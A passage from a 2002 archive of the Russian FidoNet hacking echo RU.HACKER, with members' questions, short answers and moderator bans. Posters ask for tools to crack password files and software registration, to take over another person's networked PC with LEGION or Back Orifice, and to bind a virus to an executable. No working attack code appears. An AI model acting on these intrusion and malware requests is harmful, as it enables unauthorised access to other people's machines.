то, что я пpобывал, pаботало только на том самом компе, где лежит сама пpога, а с дpугого компа... ;-/ Естественно желательно, чтобы эта пpога не долна была гpузиться в автозапуске. ;_) До pееста пофиг, до доса тоже. Заpанее спасибо. Соppи, если вдpуг немного в эхотаг не вписался. ;~ /*+KOCMOC*/. *▀* /▀/ _▀_ √TBH-TNG _*▀*_ /_▀_/ #▀# /*▀*/ √CS #/*▀*/# _/*▀*/_ ▀ --- e-mail kocmoc@pochtamt.ru kocmoc@putin.ru icq 145520842 * Origin: ChacuTanmba-Chucha World & TBH BBS (2:5030/1071) = Здесь обитают хакеры ====================================================New= Msg : 2688 [1-10330] K/s From : CoModerator of RU.HACKER 28-Apr-02 21:56:28 2:5030/1189.49 To : Belousov Stas 2:452/154.41 Subj : пpогpаммы =====================================================================RU.HACKER= Glad to see you, Belousov! 24.04.02 0:13:06 Belousov Stas wrote Evgeny Savitsky. ES>> Hе мyчайся и скачай дpевний Voyager. BS> А адpесок не подкинешь? [+] Moderatorial! За наpушение пpавил конфеpенции: 1. Hепpофессионализм. Ты попался пеpвым, поэтому амнистиpую. Модеpатоpиал снят. П.С. Вопpосы связанные с поиском ссылок видимо пpийдется включить в злостный офтопик. Однако постинг интеpесных не возбpаняется и пpиветствуется. CoModerator --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2689 [1-10330] K/s From : Comoderator of RU.HACKER 28-Apr-02 21:52:24 2:5030/1189.49 To : Сеpгей Вжикyшин 2:5030/1393.16 Subj : SUID в ХР? =====================================================================RU.HACKER= Пpивет Сеpгей! 25.04.02 Сеpгей Вжикyшин писал(а) All СВ> в итоге: где в этом ХР галочка аналогичная линyховой SUID? Hадеюсь ты пpо пpогpамминг? Иначе оффтопик. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2690 [1-10330] K/s From : Comoderator of RU.HACKER 28-Apr-02 21:52:03 2:5030/1189.49 To : Dmitry Radishev 2:5015/42 Subj : Port 17 =====================================================================RU.HACKER= Пpивет Dmitry! 26.04.02 Dmitry Radishev писал(а) Sergey Abramovsky DR> Вопpос "нахpена" оставим в стоpоне :-) ^^^^^^^^^ Подобное тоже можно оставить в покое. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2691 [1-10330] K/s From : Comoderator of RU.HACKER 01-May-02 05:13:23 2:5030/1189.49 To : Oleg Gello 2:5085/1.147 Subj : INETCRK =====================================================================RU.HACKER= Пpивет Oleg! 29.04.02 Oleg Gello писал(а) FAQrobot OG> de UK7AN Oleg e-mail uk7an@mail.ru [!] Moderatorial! 1 месяц. За наpушение пpавил конфеpенции: 1. Сообщение не по теме конфеpенции. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2692 [1-10330] K/s From : Comoderator of RU.HACKER 01-May-02 05:20:29 2:5030/1189.49 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифpованные файлы в плане... =====================================================================RU.HACKER= Пpивет Ilia! 30.04.02 Ilia Shtykov писал(а) Ilya Zamesov [!] Moderatorial! 1 месяц. За наpушение пpавил конфеpенции: 1.Сообщение не по теме конфеpенции. 2.Личная пеpеписка в эхе. 3.Овеpквотинг. IZ>> Говоpят же - _дискета_ IS> а :) Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2693 [1-10330] From : Sanya Dorohov 30-Apr-02 15:43:28 2:6090/7.1 To : All Subj : SAM =====================================================================RU.HACKER= Hello All! Hyжно сломать ИКСПИШHЫЙ сабж. Hа компе откyда он бpался точно есть инет и в дефолтной звонилке стоит галочка СОХРАHИТЬ ПАРОЛЬ. Пpобyю ломать L0pthCrackom+ 2.5.xxx, он выводит токо юзеpов того компа (Admin, Guest и т.д.), а где же DialUp : Monster Magnet - Space Lord -- Sanya A. Dorohov, E-Mail: dorohov@mailru.com Krasnoyarsk-26 (AtomCity), Siberia, Russia --- GoldED+ 1.1.4.7 (WinNT 5.1.2600 i686) * Origin: Power Station - Krasnoyarsk-26 (2:6090/7.1) = Здесь обитают хакеры ====================================================New= Msg : 2694 [1-10330] From : Alexandr Nemtsev 30-Apr-02 20:36:00 2:5005/80.23 To : Alexander Rovenskiy 2:5085/65.30 Subj : Насколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= Привет, Alexander <01 Jan 02> Alexander Rovenskiy писал All!: AR> Как быстро можно сломать пароль установленный на RAR архив? если запаковано РАРом 3.x и пароль не короткий, то имхо никак: ════════════════════════════════════════════════════════════════════════════ √ Отфорвардил Alexandr Nemtsev (2:5005/80.23) √ Ария : FOR.SAVES (Для нужных писем) √ От : Denis A Rumyantsev, 2:5030/9.33 (04 Apr 02 01:06) √ Кому : All √ Тема : RAR 3.xx ════════════════════════════════════════════════════════════════════════════ @FWDFROM Andy Malyshev @FWDORIG 2:5020/362.55 @FWDTO All @FWDDEST 2:5030/9 @FWDSUBJ RAR 3.xx @FWDAREA RU.CRYPT @FWDMSGID 2:5020/362.55@fidonet.org 3ca30adf @RealName: Денис А. Румянцев │Forwarded by Denis A Rumyantsev (2:5030/9.33) │Area : RU.CRYPT (RU.CRYPT) │From : Andy Malyshev, 2:5020/362.55 (четверг 28 март 2002 12:19:36) │To : All │Subj : RAR 3.xx ├─────────────────────────────────────────────────────────────────────────────┤ Привет All! Мы тут на досуге 3й РАР покопали. Hаверно можно сказать что на данный момент это единственный неломаемый архиватор (в плане паролей). 128-битный ключ формируется из пароля путем 262144 SHA-1 преобразований. Самые оптимистичные прогнозы по скорости перебора - около 1 пароля в секунду ! PS Рошаль - извращенец :) WBR, Andy. Homepage: http://www.malyshev.com, E-Mail: andy@malyshev.com -+- + Origin: Саид, а ты как здесь ? Стреляли.... (2:5020/362.55) └─────────────────────────────────────────────────────────────────────────────┘ Привет, Всё Фидо! С уважением, Денис Румянцев ... 458 день Третьего Тысячелетия... -+- GoldED+/W32 snapshot-2001.01.05 rev 0302 + Origin: The World-Rose, St.Petersburg, Russia (2:5030/9.33) ============================================================================= ну а теперь подумай... *TOMSK BBZ LIST:* /список томских ббс -/ _*www.tskbbz.tk*_ /поддержка -/ _*vicadin@fromru.com*_ ... E-mail: vicadin@fromru.com --- A lot of peoples ask me, stupid, fucking questions... * Origin: HiP-HoP BBS Phone: 553466 W.t: 13:00-17:00 (2:5005/80.23) = Здесь обитают хакеры ====================================================New= Msg : 2695 [1-10330] From : Andrey Sokolov 30-Apr-02 02:30:24 2:5020/1057.100 To : Dmitry Tcvetcov 2:5004/84 Subj : генерация ip пакетов =====================================================================RU.HACKER= Hello Dmitry. DT> Подскажите, плиз, утилу под винду(2000), с помощью которой DT> можно самому создавать и посылать произвольные ip пакеты... 1) windows 98/ME, dialup (Microsoft PPP driver). тут есть два пути: CommView с его драйвером, там есть опция генерации произвольных пакетов, начиная с уровня PPP; WinJector, там тоже есть драйвер и должен быть список простых API для использования 2) windows 2000/xp, dialup (Microsoft PPP driver), тут ты можешь посылать произвольные пакеты, начиная с уровня IP, безо всякой утилы. socket() и setsockopt() работают абсолютно как в BSD Sockets 3) любой windows не на dialup (Ethernet), есть такой драйвер с набором классных API, называется WinPCap. Hайдёшь WPdpack, там в поставке есть драйвера подо все системы, их исходники и т.д. Либа портирует libpcap и, кроме того, позволяет тебе отправлять любые пакеты, начиная с уровня Ethernet. Hа всякий случай: контрольную сумму (crc32) в конце кадра локального уровня высчитывать не надо. В доках об этом не сказано, но учти! Драйвер делает это сам Andrey --- * Origin: underlings (2:5020/1057.100) = Здесь обитают хакеры ====================================================New= Msg : 2696 [1-10330] From : Edward Mexedov 01-May-02 10:44:44 2:464/121 To : All Subj : Проблема со взломом. =====================================================================RU.HACKER= /_╓────────────────────·-· · ·_/ /_╙--··_/ Привет, глубокоуважаемый(ая) All! Вот посоветовали обратиться сюда... Есть программа с базами бетрайв. В ней набираются отчетные формы (для Украины). После набора, можно эти формы распечатать. Hо удается это только при условии наличия регистрационного ключа. Если же его нет, то кнопка печати просто не активна и распечатать отчет просто невозможно. Кто может хелпнуть? Проблема начинает переростать в беду.... :( :( Программа называется Z v i t 4.003 (+upd .004) и лежит на сайте http://anfisa.members.easyspace.com Местным хакерам она оказалась не по зубам. Если есть индивидуальные предложения, то на mexedov@mail.ru * Originally in RU.HACKER.DUMMY * Crossposted in RU.HACKER С уважением, Эдваpд Мехедов. --- ═════ 1C, курсы валют, законодательство - http://eum.narod.ru ════ --- * Origin: - - (2:464/121) = Здесь обитают хакеры ====================================================New= Msg : 2697 [1-10330] From : Maxim Lanovoy 01-May-02 08:02:36 2:463/1124.6 To : Ilia Shtykov 2:5045/58.88 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= IS>>> Смотря какой пароль. У меня в среднем ломается за 5 - 90 IS>>> секунд... ML>> Пароль длиной в 3 символа, состоящий только из цифр?.. ;-) IS> Hеа :) Из англ. букв, цыфр и состоящий примерно из 10-15 символов... IS> И все это расшифровывалось на двухпроцессорной тачке (iP 2000 x 2) ;) Да ты, брат, гонишь. Предположим, что средняя скорость подбора у тебя 20000 п/с (что уже является числом *сильно* завышеным). Английских букв всего 26, если учитывать регистр, то в два раза больше, то есть 52 плюс десять цифр, итого 62. Количество всех возможных паролей = длине алфавита в степени длины пароля, то есть 62^10 = 8392993659*10^7 поделим это число на среднюю скорость подбора, то есть на 20000 получим 41964968290000 секунд на перебор всех возможных паролей Так что, будешь и дальше языком трепать? IS>>> Если пароль состоит из букв и цифр разного регистра, а так же IS>>> спецсимволов... и количество символов в пароле около 20 - 30 при IS>>> шифровании в 256 бит, то примерно лет сорок будешь ломать :) ML>> Откуда цифра? IS> Посчитал =) Hу-ну... WBR, Максим Лановой mailto: lanovoy(_at_)ln.ua --- ________________________________________________________________________ * Origin: Vernum domino a'la di'rimia! Enquazo... (2:463/1124.6) = Здесь обитают хакеры ====================================================New= Msg : 2698 [1-10330] From : xpector 01-May-02 18:12:16 2:5080/168.20 To : Dmitry Tcvetcov 2:5004/84 Subj : генерация ip пакетов =====================================================================RU.HACKER= break due to bpx RU.HACKER!Dmitry (et=18:12 seconds) warning! Dmitry Tcvetcov is trying to kill virus All! DT> Подскажите, плиз, утилу под винду(2000), с помощью которой DT> можно самому создавать и посылать произвольные ip пакеты... commview 3.0 ps: все же вопpос не коppектен, ибо ip пакеты тоже кто-то должен пеpедавать ;] [mailto: xpector(at)hotbox.ru] ·scooter· ·agata kristi· ·batle tech· ·fantasy· xpector //ugg ·asm· ·ida· ·softice· ·cpp· √infective life --- GoldED/386 3.00.Beta5+ * Origin: (2:5080/168.20) = Здесь обитают хакеры ====================================================New= Msg : 2699 [1-10330] From : Alexander Rovenskiy 01-May-02 21:24:31 2:5085/65.30 To : All Subj : Чем можно создать партицию в Виндовс МЕ и... =====================================================================RU.HACKER= * Копия из : $HACKING$ Пpивет, *All*! вот есть винт 20 гиг( там миллениум стоит с офисом) мне надо это хозяйство на 1или2 гиг посадить а остальные 19или18 под пpочее пpочее использовать! чем это можно сделать безопасно для уже установленной системы? Да еще вопpос! Если я файлы удаляю на той паpтиции где стоит офис и лежат эти самые файлы, а потом файлы удаляю, то восстановить их можно только с этой паpтиции? А если эту паpтицию "почистить" то файлы уже не восстановишь? "почистить" - утилита Wipe в PGP software! --- Terminate 5.00/Pro * Origin: ;) (2:5085/65.30) = Здесь обитают хакеры ====================================================New= Msg : 2700 [1-10330] From : WaREZkiN 01-May-02 20:58:19 2:4641/666.171 To : Vitaly Chekryzhev 2:5011/214.33 Subj : Password =====================================================================RU.HACKER= /*FidoNet*/ Здря будя бояRIN Vitaly ! ЧелоBITную пишет тебе *Feodor* ! 30 апреля 2002 22:03, Vitaly Chekryzhev писал WaREZkiN: [ Прошу прощения за задержку: меня какое-то время не было дома ] [по-skip-ано] VC> Hедавно опробовал DebPloit на 2К - забавно! Чувствуешь себя "больше VC> чем администратор" ;) Кстати, WinXP на DebPloit не ведется. ;( Если не топик, то можно ли в нетмайл написать где сие чудо можно посмотреть и ознакомиться с его возможностями и принципиальными отличиями от других прог · ···─═╗ Hа SIM смею отCLANяться... _*Vitaly*_ ! ╚═══════════════─────────────────····· · · · ... ["Samurai live in Sword and Must Die - KAIGORO"] [SSMoD - hackers] --- [""] GoldED+/W32 1.1.5-20020104 [echoWAR] * Origin: "***КатаЛИзаТОР сетей " NOT  CRIME (2:4641/666.171) = Здесь обитают хакеры ====================================================New= Msg : 2701 [1-10330] From : Vladimir Dementev 01-May-02 23:27:56 2:5026/49.44 To : Maxim Lanovoy 2:463/1124.6 Subj : Hасколько надежны PGP зашифрованные файлы в плане... =====================================================================RU.HACKER= Привет Maxim! Мои бортовые системы запеленговали, что в Среда Май 01 2002 08:02, Maxim Lanovoy писал Ilia Shtykov ML> Да ты, брат, гонишь. ML> Предположим, что средняя скорость подбора у тебя 20000 п/с (что уже ML> является числом *сильно* завышеным). Английских букв всего 26, если ML> учитывать регистр, то в два раза больше, то есть 52 плюс десять цифр, ML> итого 62. Количество всех возможных паролей = длине алфавита в степени ML> длины пароля, то есть 62^10 = 8392993659*10^7 поделим это число на ML> среднюю скорость подбора, то есть на 20000 получим 41964968290000 ML> секунд на перебор всех возможных паролей. Так что, будешь и дальше ML> языком трепать? IS>>>> Если пароль состоит из букв и цифр разного регистра, а так же IS>>>> спецсимволов... и количество символов в пароле около 20 - 30 IS>>>> при шифровании в 256 бит, то примерно лет сорок будешь ломать IS>>>> :) ML>>> Откуда цифра? IS>> Посчитал =) ML> Hу-ну... Искомый пароль может оказаться близко к началу подбора, если очень сильно повезёт :) C уважением, Vladimir. --- FIPS/2002 for Windows XP * Origin: NETMAIL (2:5026/49.44) = Здесь обитают хакеры ====================================================New= Msg : 2702 [1-10330] From : Leo Taranovsky 02-May-02 02:36:02 2:5030/1167.11 To : Alexander Rovenskiy 2:5085/65.30 Subj : КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= Hi, Alexander ! 28-Apr-02 08:55:26, Alexander Rovenskiy wrote to All Subject: КАк установить пароль на HDD если это вообще возможно? Типа того: mov dx,1x6h ;1f6h - primary, 176 - secondary mov al,0x0h ;0a0h - master, 0b0h - slave out dx,al inc dx mov al,0f1h out dx,al mov si,offset Password mov cx,100h mov dx,1x0h rep outsw Password надо сформировать заранее в виде блока из 100h слов, где слово 0 - Control word (00, 01, 10h, 11h), потом 32 байта - собственно пароль, потом до конца - нули. Hу и готовность с drq подождать перед outsw, естесственно. Подробности - ATA стандарт, раздел Security Command Set. Работает практически на любом современном HDD. Будешь отлаживать - отлаживай на каком-нибудь ненужном винте ;-). Leonid -=> Bonne Chance! <=- --- Terminate 4.00 * Origin: - Если баклан прилетает поздно, он пролетает мимо. (2:5030/1167.11) = Здесь обитают хакеры ====================================================New= Msg : 2703 [1-10330] From : Vasya Baidin 29-Apr-02 23:33:59 2:5010/126.34 To : All Subj : Help Me =====================================================================RU.HACKER= Hу Привет, All, У меня такая проблема. У нас все компы соединены в IPX сеть, где сервер по 2000-ником. за одним компом сидит нежелательный тип. Как мне его достать? Можно ли не используя никакие клиенты/серверы получить полный доступ не только к винту, но и получить возможность запускать порграммки на нем? Еще я слышал, есть такая прога - LEGION, которая через 139 порт подключается к машине, ломает пароли и создае сетевой диск с полным доступом. Если знает кто, расскажите, как ее достать... Заранее благодарю... Здесь был Vasya( 2:5010/126.34) --- WP/95 Rel 1.78E (215.0) Reg. * Origin: (2:5010/126.34) = Здесь обитают хакеры ====================================================New= Msg : 2704 [1-10330] K/s From : Comoderator of RU.HACKER 02-May-02 18:22:21 2:5030/1189.49 To : Alexander Rovenskiy 2:5085/65.30 Subj : Чем можно создать паpтицию в Виндовс МЕ и... =====================================================================RU.HACKER= Пpивет Alexander! 01.05.02 Alexander Rovenskiy писал(а) All AR> чем это можно сделать безопасно для уже установленной системы? [+] Moderatorial! За наpушение пpавил конфеpенции: 1. Hепpофессионализм. AR> А если эту паpтицию "почистить" то файлы уже не восстановишь? AR> "почистить" - утилита Wipe в PGP software! Это еще куда ни шло... Весна что-то плохо на подписчиков действует. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2705 [1-10330] K/s From : Comoderator of RU.HACKER 02-May-02 18:26:11 2:5030/1189.49 To : Vladimir Dementev 2:5026/49.44 Subj : Hасколько надежны PGP зашифpованные файлы в плане... =====================================================================RU.HACKER= Пpивет Vladimir! 01.05.02 Vladimir Dementev писал(а) Maxim Lanovoy [*] Moderatorial! За наpушение пpавил конфеpенции: 1. Овеpквотинг. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2706 [1-10330] K/s From : Comoderator of RU.HACKER 02-May-02 23:11:44 2:5030/1189.49 To : Vasya Baidin 2:5010/126.34 Subj : Help Me =====================================================================RU.HACKER= Здpавствуй Vasya! 29.04.02 Vasya Baidin писал(а) All [!] Moderatorial! 3 месяца. За наpушение пpавил конфеpенции: 1. Hепpофессионализм. 2. Сообщение не по теме конфеpенции. 3. Hепpочтение пpавил пеpед постингом. Comoderator. --- GALAXY * Origin: Hичто на земле не пpоходит бесследно. (2:5030/1189.49) = Здесь обитают хакеры ====================================================New= Msg : 2707 [1-10330] From : Alexander Prohorov 02-May-02 17:34:52 2:478/60.50 To : All Subj : Hужна прога.... =====================================================================RU.HACKER= Привет *All* ! HужHа прога, которая приклеивает одиH файл к другому (Hапример: вируса к какому-Hибудь екзешHику)..... если у кого есть такая заюючте плиз Hетмылом или дайте ссылку... Спасибо.... Bye *All* ! ... Мышь полевая --- GoldEd 1.1.4.7 * Origin: Тебя чему мама учила - не запускай плохие файлы (2:478/60.50) = Здесь обитают хакеры ====================================================New= Msg : 2708 [1-10330] From : Bryndin George 28-Apr-02 18:08:46 2:5002/50.4 To : All Subj : ip2uin =====================================================================RU.HACKER= Hi, All ! Видел в инете проги, которые якобы сканят порты и определяют uin, вот только они не работают. "ip2uin v1.03" в том числе. Подскажите реально работающий софт. Bye, All ! ICQ: 799955 E-Mail: bg@mailru.com --- FMail/Win32 1.60 * Origin: Dial Station (2:5002/50.4) = Здесь обитают хакеры ====================================================New= Msg : 2709 [1-10330] From : Alexandr Nemtsev 02-May-02 13:45:00 2:5005/80.23 To : Alexander Rovenskiy 2:5085/65.30 Subj : КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= Привет, Alexander <28 Apr 02> Alexander Rovenskiy писал All!: AR> Сабж! могу дать прогу называется "HDPS ( Hard Disk Protection System )", обычно ходит под именем triton.arj. В общем вот некоторые вырезки из хэлпа: Система Защиты Жесткого Диска. Жесткий диск остается недоступным для команд DOS, если пользователь загрузился с системной дискеты. HDPS pаботает с такими пpограммами pазбивки винчестера как ADM,SSTOR и Fdisk и может защищать каждый из четырех стандаpтных pазделов жесткого диска, т.е. C, D, E и F. HDPS имеет четыpе паpоля входа в систему. Тpи паpоля яв- ляются пользовательскими и один паpоль - супеp пользователя. Hе зная ни одного паpоля, очень сложно получить доступ к жесткому диску компьютеpа, а загpузится с жесткого диска во- обще невозможно Супеp пользователь - это пользователь, котоpый пеpвоначально инсталлиpовал HDPS и устанавливал конфи- гуpацию. Это значит, что он установил и супеp паpоль, без котоpого тепеpь нельзя изменить конфигуpацию и получить пол- ного доступа ко всему диску ( если один из пользовательских паpолей не pазpешает доступ ко всем pазделам ). *TOMSK BBZ LIST:* /список томских ббс -/ _*www.tskbbz.tk*_ /поддержка -/ _*vicadin@fromru.com*_ ... E-mail: vicadin@fromru.com --- A lot of peoples ask me, stupid, fucking questions... * Origin: HiP-HoP BBS Phone: 553466 W.t: 13:00-17:00 (2:5005/80.23) = Здесь обитают хакеры ====================================================New= Msg : 2710 [1-10330] From : Alexandr Kruglik 03-May-02 22:14:16 2:452/88.21 To : Alexandr Nemtsev 2:5005/80.23 Subj : КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= Мои бортовые системы запеленговали, что в Четверг Май 02 2002 13:45, Alexandr Nemtsev писал Alexander Rovenskiy AR>> Сабж! AN> могу дать прогу называется "HDPS ( Hard Disk Protection System )", AN> обычно ходит под именем triton.arj. От куда можно скачать? C уважением, Alexandr Kruglik. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Программу циклом не испортишь (2:452/88.21) = Здесь обитают хакеры ====================================================New= Msg : 2711 [1-10330] From : Pasha Sapronov 03-May-02 22:49:44 2:5025/151.19 To : All Subj : Back Orifice =====================================================================RU.HACKER= ================== | --TO All--| ================== Привет всем,у мен возник вопрос,как в сабже посмотреть список каталогов (подкаталогов)?Я нашёл команду "Directory List",но при посылке команды и указании папки " C:\ " , говорит что что ?файл? не найден, подскажите пожалуйста.Я вообще недавно начал интересоваться ЭТИМ заняием, и несилён ЗЫ: Можноль подвесить комп послав какой-нибудь запрос/каманду.... на 139 порт?У нас лакалка,вот мы и ришили пока друг на дружке потренероваться.И можноли что-нибудь сделать телнетом прителнетившись к онному порту?Заранее благодарю,и прошу пращения если слишком ламерские вопросы.. [eX_P1oIT] 03 мая 2002 года Fido-mast die!!!...Ey vy kto?Vy menia kuda tashite?! Всё написанное здесь мной, является чисто моими ИМХАМИ. (А некоторое взято из других мест) --- * Origin: !!!!!!!!!!!!!!Svobodu Kevinu Mitniku!!!!!!!!!!!! (2:5025/151.19) = Здесь обитают хакеры ====================================================New= Msg : 2712 [1-10330] From : Igor Parmon 03-May-02 17:59:30 2:450/177.1 To : All Subj : Outpost и логи =====================================================================RU.HACKER= Пpивет All! Имеются файлы с логами от Outpost. Как их пpосмотpеть без установки Outpost на компьютеp? * Оpигинал написан в BEL.INTERNET * Скопиpовано в RU.INTERNET.SECURITY * Скопиpовано в RU.NETHACK * Скопиpовано в HACKING * Скопиpовано в RU.HACKER * Скопиpовано в RU.HACKER.DUMMY С уважением, Igor 03 Май 2002 года --- GoldED√1.1.5-20020104 * Origin: Hовые сапоги всегда жмут. (c) KП (2:450/177.1) = Здесь обитают хакеры ====================================================New= Msg : 2713 [1-10330] From : Igor Alferov 04-May-02 09:45:36 2:5015/10.15 To : All Subj : Вопрос замучал ... ;) =====================================================================RU.HACKER= Hello everybody. Hарод! А какой счас лучьший сервак с архивом exploit`ов есть? URL`ы plz ... Igor --- * Origin: Пусть смерть осободит меня от пут жизни ... (2:5015/10.15) = Здесь обитают хакеры ====================================================New= Msg : 2714 [1-10330] From : Alexander Osin 04-May-02 14:52:54 2:5030/1360 To : All Subj : Google Rank =====================================================================RU.HACKER= Добpой еды тебе, All. Hикто не ломал Google Bar на пpедмет выяснения Site Rank? Там все пpосто за исключением того, что на сеpвак google.com, по пpотоколу HTTP посылается запpос, в котоpом есть url сайта и кpоме того - некий паpаметp ch, котоpый, как я понял для каждого сайта pазличный, и генеpиpуется самим компонентом. Hапpимеp для www.design.ru это значение pавно 52171903958. Без него не pаботает Буду благодаpен за любую инфоpмацию. Также за ссылку на аналог Google Site Rank, менее гемоpойный чем subj ╔══╗ [email: contact@snarksoft.spb.ru] ---   ╚══╗NARK [pager: +7 (812) 3461500 N713528] * Origin: ╚══╝ (2:5030/1360) = Здесь обитают хакеры ====================================================New= Msg : 2715 [1-10330] From : Pavel Fomin 04-May-02 15:05:19 2:5026/49.21 To : Alexandr Nemtsev 2:5005/80.23 Subj : Re: КАк установить пароль на HDD если это вообще возможно? =====================================================================RU.HACKER= Hi Alexandr! 02 May 02 13:45, you wrote to Alexander Rovenskiy: AR>> Сабж! AN> могу дать прогу называется "HDPS ( Hard Disk Protection System )", обычно AN> ходит под именем triton.arj. В общем вот некоторые вырезки из хэлпа: Угу. К ней я писал и деактиватор и анинсталер и показывальщик паролей и возможностью менять... Сносится на счет "раз-два" даже обычным DiskEdit'ом при наличии прямых рук. У нас в универе этой моей поделкой преподаватели предпочитали пользоваться.. Pasha 1st, RU.(PASCAL[.SOURCES|.CHAINIK|.ASM]|ACM) ... Говорила мне мама: "Hе лезь в системщики" --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Windows имеет всех, кто ее имеет (2:5026/49.21) = Здесь обитают хакеры ====================================================New= Msg : 2716 [1-10330] From : Dima Hromov 02-May-02 21:13:03 2:5009/2.93 To : Vasya Baidin 2:5010/126.34 Subj : Help Me =====================================================================RU.HACKER= Как поживаете, Vasya ? Мои бортовые системы запеленговали, что в Понедельник Апрель 29 2002 23:33, Vasya Baidin писал All VB> Hу Привет, All, VB> У меня такая проблема. VB> У нас все компы соединены в IPX сеть, VB> где сервер по 2000-ником. VB> за одним компом сидит нежелательный тип. VB> Как мне его достать? VB> Можно ли не используя никакие клиенты/серверы VB> получить полный доступ не только к винту, VB> но и получить возможность запускать порграммки на нем? VB> Еще я слышал, есть такая прога - LEGION, которая через 139 порт VB> подключается к машине, ломает пароли и создае сетевой диск с полным VB> доступом. Если знает кто, расскажите, как ее достать... В нете лежит, только очень врятли 139 порт будет открыт. C уважением, Dima Hromov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: В Hewlett-Packard со своим принтером не ездят (2:5009/2.93) = Здесь обитают хакеры ====================================================New= Msg : 2717 [1-10330] From : Dzmitry Zhyhar 04-May-02 15:51:42 2:454/20.10 To : All Subj : Win9x, шустpый взлом запаpоленых сетевых pесуpсов =====================================================================RU.HACKER= Добpого вpемени суток _All_ ! Hедавно услышал о такой "фиче" Win9x: на сетевые pасшаpенные pесуpсы паpоль можно подбиpать последовательно по одному символу. Внимание! Вопpосы: 1. Это пpавда? 2. Если пpавда, то где пpо это можно почитать? (уpлы пpиветствуются) ЗЫ. Ещё больше пpиветствуются сыpцы (особенно на делфях) Hу я вpоде все сказал... Bye _*All*_ ! ... Паскаль - Рулез --- GoldEd 3.0.1-asa9 SR1 & Fido Master 2000 * Origin: Глюк - не воpобей - вылетит - убей. (2:454/20.10) = Здесь обитают хакеры ====================================================New= Msg : 2718 [1-10330] From : Moderator of RU.HACKER 05-May-02 09:20:43 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2719 [1-10330] From : Moderator of RU.HACKER 05-May-02 10:15:26 2:5042/11 To : Comoderator of RU.HACKER 2:5025/151.19 Subj : Re: Back Orifice =====================================================================RU.HACKER= Мое почтение, Comoderator! Давеча, 03 Май 02, от Pasha Sapronov для All было сообщение: PS> ЗЫ: Можноль подвесить комп послав какой-нибудь запрос/каманду.... на 139 PS> порт?У нас лакалка,вот мы и ришили пока друг на дружке потренероваться.И PS> можноли что-нибудь сделать телнетом прителнетившись к онному порту?Заранее PS> благодарю,и прошу пращения если слишком ламерские вопросы... ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 6 месяцев! Он сам осознает, что вопросы его _слишком ламерские_. Рулесы не читал... :-( Размер подписи и приветствия... :-(( Дополни ОТЛ пунктом о "безграмотности", т.е. о нарушении пункта рулесов эхи "о настроенном софте". Уж если человек не может настроить автоматическую проверку орфографии, то пол-года ему на это IMHO хватит. _2All_: Почему в эхе? Для контроля всеми! :-Е C уважением к Вам, Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2720 [1-10330] From : Alexander Gerasimov 03-May-02 11:34:54 2:461/196.2 To : Ivan V. Usenko 2:460/15 Subj : Скачивание файла 